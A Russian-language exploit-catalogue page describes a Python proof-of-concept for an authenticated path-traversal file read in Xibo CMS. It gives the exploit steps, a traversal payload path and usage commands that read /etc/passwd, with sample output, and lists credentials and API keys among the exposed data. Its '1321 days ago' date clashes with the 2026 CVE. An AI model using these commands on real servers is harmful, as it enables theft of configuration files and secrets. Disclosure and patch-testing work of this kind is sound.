Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-77578 — Python proof-of-concept, эксплуатирующий CVE-2026-77578 — аутентифицированный обход пути в Xibo CMS, позволяющий читать произвольные локальные файлы через специально сформированный импорт XML-шаблонов. | Kitploit
Инструменты/GitHubGitHub/soskalai/cve-2026-77578
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsoskalai/cve-2026-77578

CVE-2026-77578

Python proof-of-concept, эксплуатирующий CVE-2026-77578 — аутентифицированный обход пути в Xibo CMS, позволяющий читать произвольные локальные файлы через специально сформированный импорт XML-шаблонов.

Репозиторий
1321 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-77578 — Произвольное локальное чтение файлов в Xibo CMS

Обзор

CVE-2026-77578 — это уязвимость произвольного локального чтения файлов с аутентификацией в Xibo CMS.

Аутентифицированный пользователь с правами администратора или доступом к шаблонам модулей может импортировать специально созданный XML-шаблон, содержащий ресурс на основе пути с последовательностью обхода. Полученный ресурс затем может быть доступен через конечную точку ресурсов модуля, что заставляет Xibo вернуть содержимое указанного локального файла.

Уязвимые и исправленные версии

  • Уязвимые: Xibo CMS <= 4.4.3
  • Исправленные: Xibo CMS >= 4.4.4
  • Рекомендуемое исправление: Обновитесь до Xibo CMS 4.4.4 или более поздней версии.

Детали уязвимости

  • CVE: CVE-2026-77578
  • GHSA: GHSA-pc3g-2hhm-46qc
  • Тип уязвимости: CWE-22 — Обход пути
  • Аутентификация: Требуется
  • Требуемые привилегии: Доступ к функции шаблонов разработчика
  • Уровень опасности: Высокий
  • CVSS v3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • Воздействие: Чтение файлов, доступных пользователю веб-сервера

Доказательство концепции

Официальное уведомление Xibo

Xibo опубликовал уязвимость как GHSA-pc3g-2hhm-46qc, подтвердив, что версии <= 4.4.3 уязвимы, а >= 4.4.4 исправлены. В уведомлении присвоен высокий уровень опасности с оценкой CVSS v3.1 8.8 и указан CVE-2026-77578.

Предоставленный PoC на Python автоматизирует процесс эксплуатации:

  1. Выполняет аутентификацию в Xibo CMS.
  2. Извлекает CSRF-токен со страницы шаблонов модулей.
  3. Генерирует уникальный идентификатор ресурса.
  4. Загружает специально созданный XML-шаблон через /developer/template/import.
  5. XML содержит ресурс на основе пути с использованием последовательности относительного обхода пути.
  6. Запрашивает полученный ресурс через /module/asset/<asset-id>.
  7. Отображает содержимое запрошенного локального файла.

Использование

python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>

Пример:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/passwd

Другой пример:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/os-release

Опция -f по умолчанию имеет значение /etc/passwd.

Пример вывода

Ниже демонстрируется успешное получение /etc/passwd:

==============================================
 FILE CONTENT
==============================================

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

CVE-2026-77578 PoC Output

Техническая схема

Authenticated User
        |
        v
GET /developer/template/view
        |
        v
Extract X-XSRF-TOKEN
        |
        v
POST /developer/template/import
        |
        |  Crafted XML
        |  path="../../../../../etc/passwd"
        v
Xibo creates the asset
        |
        v
GET /module/asset/<asset-id>
        |
        v
Contents of local file returned

Валидация

Уязвимость была успешно подтверждена на нескольких файлах в локальной тестовой среде Xibo CMS 4.4.3, включая:

  • /etc/passwd
  • /etc/hosts
  • /etc/os-release
  • /var/www/cms/web/index.php

Тест с исходным файлом PHP демонстрирует, что проблема способна возвращать исходный код приложения, а не только системные метаданные.

Воздействие

Успешная эксплуатация позволяет аутентифицированному злоумышленнику с необходимыми привилегиями шаблонов модулей читать произвольные файлы, доступные процессу приложения Xibo.

В зависимости от развёртывания это может раскрыть:

  • Исходный код приложения
  • Файлы конфигурации
  • Учётные данные
  • Ключи API
  • Информацию о подключении к базе данных
  • Другие конфиденциальные данные файловой системы

Отказ от ответственности

Данное доказательство концепции предоставлено исключительно для авторизованных исследований в области безопасности и защитного тестирования.

Тестируйте только те системы, которыми вы владеете или на оценку которых у вас есть явное разрешение.

Структура репозитория

CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
    └── poc-output.png
Скачать инструмент